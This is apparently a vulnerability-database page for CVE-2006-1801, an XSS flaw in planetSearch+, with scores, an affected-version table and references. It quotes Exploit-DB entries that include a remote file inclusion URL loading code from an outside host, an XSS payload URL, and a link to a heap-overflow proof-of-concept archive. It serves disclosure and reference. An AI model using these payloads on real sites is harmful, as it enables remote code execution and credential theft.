CVE-2006-1801
Published 2006-04-18
Priority P4 · 18 · medium · 4.3 (CVSS 2.0)
AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.88% (76.9th percentile)
Cross-site scripting (XSS) vulnerability in planetsearchplus.php in planetSearch+ allows remote attackers to inject arbitrary web script or HTML via the search_exp parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| planet_concept | planetsearch | <= 2005-10-26 | — |
No detection rules found.
Exploit-DB
Boite de News 4.0.1 - 'index.php' Remote File Inclusion
exploitdb·2006-08-09
CVE-2006-4123 Boite de News 4.0.1 - 'index.php' Remote File Inclusion
---
########################################################################
# Boite de News v4.0.1 Remote File Inclusion Vulnerability
#
# Download: ftp://ftp1.comscripts.com/PHP/1801_boiteden-401.zip
#
# Found By: the master
#
########################################################################
# exploit:
#
# http://[Target]/[Path]/boitenews4/index.php?url_index=http://cmd.gif?
########################################################################
# milw0rm.com [2006-08-09]
Exploit-DB
libextractor 0.5.13 - Multiple Heap Overflows (PoC)
exploitdb·2006-05-17
CVE-2006-2458 libextractor 0.5.13 - Multiple Heap Overflows (PoC)
---
# libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1801.zip (05172006-libextho.zip)
# milw0rm.com [2006-05-17]
Exploit-DB
PlanetSearch + - 'Planetsearchplus.php' Cross-Site Scripting
exploitdb·2006-04-13
CVE-2006-1801 PlanetSearch + - 'Planetsearchplus.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17527/info
PlanetSearch + is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/planetsearchplus.php?search_exp=[XSS]
No writeups or analysis indexed.
http://d4igoro.blogspot.com/2006/04/planetsearch-xss-vulnerabilities.html
http://secunia.com/advisories/19681
http://www.securityfocus.com/archive/1/431033/100/0/threaded
http://www.securityfocus.com/bid/17527
http://www.vupen.com/english/advisories/2006/1368
https://exchange.xforce.ibmcloud.com/vulnerabilities/25832
Published: 2006-04-18